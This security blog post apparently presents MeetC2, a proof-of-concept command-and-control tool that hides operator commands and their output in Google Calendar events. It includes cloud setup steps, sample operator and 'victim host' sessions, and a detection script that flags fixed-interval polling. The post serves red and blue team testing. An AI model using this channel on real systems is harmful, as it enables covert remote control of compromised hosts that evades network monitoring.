MeetC2 – A serverless C2 framework that leverages Google Calendar APIs as a communication channel

MeetC2 is a PoC C2 tool using Google Calendar to mimic cloud abuse, helping teams test detection, logging, and response.

---

**Background:** Modern adversaries increasingly hide command-and-control (C2) traffic inside cloud services. We built this proof of concept (PoC) to study and demonstrate those techniques in a controlled way, emulating those tactics so red and blue teams can exercise detection, telemetry, and response to cloud abuse scenarios.

**Storytime:** During an internal purple-team exercise, we saw how easily traffic to trusted SaaS domains slipped. We built a lightweight, cross-platform PoC that uses Google Calendar, giving teams a reproducible way to validate detections, logging, and third-party app governance for cloud-abuse C2 in a controlled environment.

**MeetC2:** [MeetC2](https://github.com/deriv-security/MeetC2) is a proof-of-concept C2 framework that uses the Google Calendar API as a covert communication channel between operators and a compromised system.

Overview
--------

[MeetC2](https://github.com/deriv-security/MeetC2), a.k.a. MeetingC2, is a cross-platform (macOS/Linux) application that demonstrates how legitimate cloud services can be abused for adversarial operations. By using Google Calendar APIs, the framework creates a hidden communication channel that blends in with normal business traffic.

Domains utilised here are ‘*oauth2.googleapis.com*’ & ‘*www.googleapis.com*’.

Once authenticated, the agent enters a polling loop, sending GET requests every 30 seconds to ‘*www.googleapis.com/calendar/v3/calendars/{calendarId}/events*’ to check for new calendar events containing commands.

When the organiser wants to issue a new command, they can **POST** a new event to the same Calendar API endpoint via the ‘*organiser*’ agent, with the command embedded in the event’s summary field, like ‘*Meeting from nobody: [COMMAND]*’.

The ‘*guest*’ agent identifies these command events during its regular polling, extracts and executes the command locally, then updates the same event via a **PUT** request to include the command output inside the *[OUTPUT] [/OUTPUT]* tags in the description field.

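
The polling and tagging behaviour described above gives defenders two signals to hunt for. The following is an added example, not code from MeetC2 or the original post: it flags hosts that GET the Calendar events endpoint at a near-constant interval and checks event fields for the markers named above. The log format (from a TLS-inspecting proxy, since the URL path is otherwise hidden), host names, thresholds and function names are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample log: "<UTC time> <source host> <method> <URL>" (assumed format).
CAL = "https://www.googleapis.com/calendar/v3/calendars/abc123xyz@group.calendar.google.com/events"
SAMPLE_LOG = "\n".join(
    # Automated client: one GET roughly every 10 seconds.
    [f"2025-09-01T16:08:{s:02d}Z build-mac-07 GET {CAL}" for s in (4, 14, 24, 35, 45, 55)]
    # A person opening the same calendar at irregular times.
    + [f"2025-09-01T16:{t}Z hr-laptop-02 GET {CAL}"
       for t in ("01:10", "03:42", "04:05", "19:30", "40:02")]
)
EVENTS_URL = re.compile(
    r"https://www\.googleapis\.com/calendar/v3/calendars/([^/?]+)/events(?:\?|$)")
OUTPUT_TAGS = re.compile(r"\[OUTPUT\].*?\[/OUTPUT\]", re.S)


def find_pollers(log_text, min_requests=5, max_jitter=0.1):
    """Map (host, calendar_id) -> mean gap in seconds for fixed-interval GET polling."""
    seen = defaultdict(list)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue  # skip malformed lines
        ts, host, method, url = fields
        m = EVENTS_URL.match(url)
        if method == "GET" and m:
            seen[(host, m.group(1))].append(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"))
    flagged = {}
    for key, times in seen.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        # Coefficient of variation: near 0 for a timer loop, large for human use.
        if len(times) >= min_requests and mean(gaps) > 0 and pstdev(gaps) / mean(gaps) <= max_jitter:
            flagged[key] = round(mean(gaps), 1)
    return flagged


def event_markers(event):
    """Return which of the markers described on this page appear in a Calendar event dict."""
    hits = []
    if event.get("summary", "").startswith("Meeting from nobody:"):
        hits.append("summary-prefix")
    if OUTPUT_TAGS.search(event.get("description", "")):
        hits.append("output-tags")
    return hits
```

The marker strings only match builds that keep the defaults described here, so treat the interval check as the more durable of the two signals.
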
![MeetC2](https://i0.wp.com/securityaffairs.com/wp-content/uploads/2025/09/image-15.png?resize=857%2C1024&ssl=1)

Google Calendar Setup
---------------------

* Navigate to the URL [Google cloud console](https://console.cloud.google.com/?hl=en), sign in with your Google account. Select a project or create a new project.
* Navigate to ‘APIs & Services’ → Click ‘Library’, in the search box, look for Google Calendar API and click ‘ENABLED’, it will take 20–30 seconds to get it enabled in your project.
* Post this, navigate to ‘APIs & Services’ → ‘Credentials’ and click ‘+ CREATE CREDENTIALS’ at the top. Choose ‘Service account’, fill in the required details, i.e., Service account name: calendar-invite, Description: Syncs calendar events and continue. Skip the optional role/users and click ‘DONE’.
* Now check your service account lists, and you should have an email like ‘calendar-invite@your-project.iam.gserviceaccount.com’. Go to the ‘KEYS’ section ‘ADD KEY’ → ‘Create new key’, choose the ‘JSON’ format and download the ‘KEY’. Rename the downloaded JSON file to credentials.json for later use.
* Navigate to the URL ‘https://calendar.google.com’, on the left side, find ‘Other calendars’ → Click the ‘+’ click on create new calendar, fill in the name/description. Post that, click on the 3 dots next to it → ‘Settings and sharing’. Scroll down to ‘Integrate calendar’, check for ‘Calendar ID’ it should look like ‘abc123xyz@group.calendar.google.com’.
* Final steps, under calendar settings, find ‘Share with specific people’ click on ‘+ Add people’, add the service account email from step 4 above (the one ending in @your-project.iam.gserviceaccount.com).
  Change the permission to ‘Make changes to events’ and click ‘Send’, and you are all set.

Command Line
------------

***Compile:***

> ./build-all.sh – -

***Attacker host:***

> bash-3.2$ ./organizer credentials.json [NAME]@group.calendar.google.com
> MeetC2 Organizer
> Commands:
> exec – — Execute on all hosts
> exec @host:- — Execute on specific host
> exec @\*:- — Execute on all hosts (explicit)
> list — List recent commands
> get – — Get command output
> clear — Clear executed events
> exit — Exit organizer
> — — — — — — — — — — — — — — — — — — — —
> \> exec whoami
> Command created for all hosts: qfj4tt8a4uoi8p7cd3b8t31337
> \>
> \>

***Victim host:***

> bash-3.2$ ./guest-darwin-arm64
> 16:08:04 MeetC2 Guest started on dhirajmishra
> 16:08:04 Calendar ID: [NAME]@group.calendar.google.com
> 16:08:04 Polling every 10 seconds…
> 16:08:15 Executing command: whoami
> 16:08:16 Successfully updated event with output

![MeetC2](https://i0.wp.com/securityaffairs.com/wp-content/uploads/2025/09/image-16.png?resize=1024%2C307&ssl=1)

**Acknowledgements:** This project was inspired by the [GC2-sheet](https://github.com/looCiprian/GC2-sheet) author [LooCiprian](https://github.com/looCiprian). Hence, special thanks to him.

**OpSec:** While this is functional, I know there are improvements in OpSec specifically for the ‘*guest*’ binary. Hence, please use a test GCP project for such a setup, which should be purged later.

### **Download MeetC2**

[**https://github.com/deriv-security/MeetC2**](https://github.com/deriv-security/MeetC2)

**About the Author: Security Researcher Dhiraj Mishra ([@mishradhiraj](https://twitter.com/mishradhiraj_))**

[Pierluigi Paganini](http://www.linkedin.com/pub/pierluigi-paganini/b/742/559) ([SecurityAffairs](http://securityaffairs.co/wordpress/) — hacking, MeetC2)
